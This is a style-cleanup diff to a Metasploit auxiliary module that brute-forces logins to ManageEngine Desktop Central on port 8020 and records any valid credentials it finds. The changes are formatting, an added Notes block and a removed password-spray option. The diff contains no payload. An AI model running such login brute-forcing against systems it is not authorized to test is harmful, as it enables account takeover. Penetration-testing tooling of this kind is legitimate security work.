@@ -12,21 +12,26 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'ManageEngine Desktop Central Login Utility',
-      'Description'    => %q{
-        This module will attempt to authenticate to a ManageEngine Desktop Central.
-      },
-      'Author'         => [ 'sinn3r' ],
-      'License'        => MSF_LICENSE,
-      'DefaultOptions' => { 'RPORT' => 8020}
-    ))
-
-    deregister_options('PASSWORD_SPRAY')
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine Desktop Central Login Utility',
+        'Description' => %q{
+          This module will attempt to authenticate to a ManageEngine Desktop Central.
+        },
+        'Author' => [ 'sinn3r' ],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => { 'RPORT' => 8020 },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
   end
 
-
   # Initializes CredentialCollection and ManageEngineDesktopCentral
   def init(ip)
     @cred_collection = build_credential_collection(
@@ -38,17 +43,16 @@ class MetasploitModule < Msf::Auxiliary
       configure_http_login_scanner(
         host: ip,
         port: datastore['RPORT'],
-        cred_details:       @cred_collection,
-        stop_on_success:    datastore['STOP_ON_SUCCESS'],
-        bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
+        cred_details: @cred_collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
         connection_timeout: 5,
-        http_username:      datastore['HttpUsername'],
-        http_password:      datastore['HttpPassword']
+        http_username: datastore['HttpUsername'],
+        http_password: datastore['HttpPassword']
       )
     )
   end
 
-
   # Reports a good login credential
   def do_report(ip, port, result)
     service_data = {
@@ -77,7 +81,6 @@ class MetasploitModule < Msf::Auxiliary
     create_credential_login(login_data)
   end
 
-
   # Attempts to login
   def bruteforce(ip)
     @scanner.scan! do |result|
@@ -115,7 +118,6 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-
   # Start here
   def run_host(ip)
     init(ip)
